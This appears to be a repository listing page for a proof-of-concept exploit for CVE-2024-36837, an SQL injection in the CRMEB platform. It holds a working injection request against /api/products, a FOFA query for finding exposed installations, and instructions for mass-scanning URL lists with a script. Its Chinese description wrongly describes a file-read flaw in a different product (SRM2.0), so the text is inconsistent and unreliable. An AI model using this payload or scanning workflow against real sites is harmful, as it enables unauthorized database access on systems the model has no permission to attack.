CVE-2024-36837 PoC — Zhongbang CRMEB 安全漏洞

Source

Associated Vulnerability

Description

CVE-2024-36837 POC

Readme

### README.md
#CVE-2024-36837
## Disclaimer

#智联云采 SRM2.0 runtimeLog/download 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

fofa语法：
body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

#POC：

GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
#将url的url前添加http://或https://
python 11.py

#how to use
python cve.py -h 

#批量检测
url.txt 的url地址要http://或https://
python cve.py -f  url.txt 

#单个检测
url地址要http://或https://
python cve.py -u url

File Snapshot

 [4.0K]  /data/pocs/46b50e50b6074a38dbe97d870c15d0ac8f1fe0a5
├── [ 871]  11.py
├── [1.6K]  cve.py
└── [1.0K]  README.md

0 directories, 3 files

Remarks